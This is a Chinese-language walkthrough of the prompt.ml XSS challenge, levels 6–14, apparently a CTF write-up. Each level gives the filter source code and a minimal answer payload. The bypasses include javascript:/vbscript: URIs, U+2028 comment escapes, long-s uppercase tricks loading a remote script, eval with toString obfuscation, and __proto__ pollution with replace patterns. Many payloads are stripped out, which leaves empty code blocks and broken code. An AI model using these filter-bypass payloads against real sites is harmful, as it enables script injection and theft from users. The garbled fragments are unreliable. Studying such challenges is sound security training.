```

Chrome下需要script闭合标签，所以上述payload不成功。最短的答案如下(35个字符)

```

```

未来所有的浏览器支持ES6，还可以使用下述编码：

```

```

或者

```

```

### 背景知识

由于xml编码特性。在SVG向量里面的` \n\
';
} catch (e) {
return 'Invalid form data.';
}
}

```

### 答案

33个字符

```
javascript:prompt(1)#{"action":1}

```

IE下可以使用vbscript减少字符

```
vbscript:prompt(1)#{"action":1}

```

Level 7
-------

* * *

可以使用js注释绕过。如下：

```

```

### 代码

```
function escape(input) {
// pass in something like dog#cat#bird#mouse...
var segments = input.split('#');
return segments.map(function(title) {
// title can only contain 12 characters
return '

';
}).join('\n');
}

```

### 答案

34个字符：

```
">

```

### 背景知识

小技巧：IE下可以使用##async##来加载不需要闭合的script文件。如下：

```

```

### 代码

```
function escape(input) {
// prevent input from getting out of comment
// strip off line-breaks and stuff
input = input.replace(/[\r\n \n\ // console.log("' + input + '"); \n\ ';
}

```

### 答案

Chrome和Firefox下 14个字符

```
[U+2028]prompt(1)[U+2028]-->

```

### 背景知识

比较奇怪的是，js中的换行符跟unicode中的不一致。另外，HTML代码的注释可以在Javascript中使用

Level 9
-------

* * *

该题使用正则`<([a-zA-Z])`，导致无法注入HTML标签。但是toUpperCase()函数是支持Unicode函数。字符`ſ`经过函数toUpperCase()处理后，会变成ASCII码字符"S"。 ### 代码 ``` function escape(input) { // filter potential start-tags input = input.replace(/<([a-zA-Z])/g, '<_$1'); // use all-caps for heading input = input.toUpperCase(); // sample input: you shall not pass! => YOU SHALL NOT PASS!
return '

' + input + '

';
}

```

### 答案

26个字符通杀浏览器的答案

```
<ſcript/ſrc=//⒕₨>

```

或者使用async

```
<ſcript/async/src=//⒛₨>

```

Level 10
--------

* * *

这个题目使用两个正则过滤。比较容易

### 代码

```
function escape(input) {
// (╯°□°）╯︵ ┻━┻
input = encodeURIComponent(input).replace(/prompt/g, 'alert');
// ┬──┬ ノ( ゜-゜ノ) chill out bro
input = input.replace(/'/g, '');

// (╯°□°）╯︵ /(.□. \）DONT FLIP ME BRO
return ' ';
}

```

### 答案

```
p'rompt(1)

```

Level 11
--------

* * *

这个题目直接允许注入数据到script标签里面，但是过滤了特殊符号。这里的技巧是使用一个数据或者字母拥有操作符的功能，就是in

### 代码

```
function escape(input) {
// name should not contain special characters
var memberName = input.replace(/[[|\s+*/\\<>&^:;=~!%-]/g, '');

// data to be parsed as JSON
var dataString = '{"action":"login","message":"Welcome back, ' + memberName + '."}';

// directly "parse" data in script context
return ' \n\
';
}

```

### 答案

```
"(prompt(1))in"

```

### 背景知识

`"test"(alert(1))`虽然会提示语法错误， 但是还是会执行js语句。类似的`alert(1)in"test"`也是一样。可以在控制台下使用F12执行

Level 12
--------

* * *

该题主要是利用toString()解答。eval可以直接执行字符串。如下：

```
parseInt("prompt",36); //1558153217

```

因此，

* 可以使用`eval((1558153217).toString(36))(1)`

* 还可以`eval(1558153217..toString(36))(1)`

* 还可以`eval(630038579..toString(30))(1)`

### 代码

```
function escape(input) {
// in Soviet Russia...
input = encodeURIComponent(input).replace(/'/g, '');
// table flips you!
input = input.replace(/prompt/g, 'alert');

// ノ┬─┬ノ ︵ ( \o°o)\
return ' ';
}

```

### 答案

32个字符通杀所有浏览器

```
eval(630038579..toString(30))(1)

// Hexadecimal alternative (630038579 == 0x258da033):
eval(0x258da033.toString(30))(1)

```

还有一种比较暴力的方法是，通过循环执行self里面的函数，来查找prompt执行(firfox下测试有效)

```
for((i)in(self))eval(i)(1)

```

Level 13
--------

* * *

这个题目涉及到js中的`__proto__`，每个对象都会在其内部初始化一个属性，就是`__proto__`，当我们访问对象的属性时，如果对象内部不存在这个属性，那么就会去`__proto__`里面找这个属性，这个`__proto__`又会有自己的`__proto__`，一直这样找下去。可以再Chrome控制台中测试：

```
config = {
"source": "_-_invalid-URL_-_",
"__proto__": {
"source": "my_evil_payload"
}
}

```

输入

```
delete config.source
config.source

```

返回

```
my_evil_payload

```

还有一个技巧是，replace()这个函数，他还接受一些特殊的匹配模式[https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/replace#Description](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/replace#Description)翻译如下：

```
$` 替换查找的字符串，并且在头部加上比配位置前的字符串部分

```

举个例子就是：

```
'123456'.replace('34','$`xss')

```

返回

```
'1212xss56'

```

### 代码

```
function escape(input) {
// extend method from Underscore library
// _.extend(destination, *sources)
function extend(obj) {
var source, prop;
for (var i = 1, length = arguments.length; i < length; i++) { source = arguments[i]; for (prop in source) { obj[prop] = source[prop]; } } return obj; } // a simple picture plugin try { // pass in something like {"source":"http://sandbox.prompt.ml/PROMPT.JPG"} var data = JSON.parse(input); var config = extend({ // default image source source: 'http://placehold.it/350x150' }, JSON.parse(input)); // forbit invalid image source if (/[^\w:\/.]/.test(config.source)) { delete config.source; } // purify the source by stripping off " var source = config.source.replace(/"/g, ''); // insert the content using mustache-ish template return ''.replace('{{source}}', source);
} catch (e) {
return 'Invalid image data.';
}
}

```

### 答案

59个字符，通杀所有浏览器

```
{"source":{},"__proto__":{"source":"$`onerror=prompt(1)>"}}

```

Level 14
--------

* * *

这个题目使用base64绕过。

### 代码

```
function escape(input) {
// I expect this one will have other solutions, so be creative 🙂
// mspaint makes all file names in all-caps 🙁
// too lazy to convert them back in lower case
// sample input: prompt.jpg => PROMPT.JPG
input = input.toUpperCase();
// only allows images loaded from own host or data URI scheme
input = input.replace(/\/\/|\w+:/g, 'data:');
// miscellaneous filtering
input = input.replace(/[\\&+%\s]|vbs/gi, '_');
return '';
}

```

### 答案

firfox下94个字符

```
">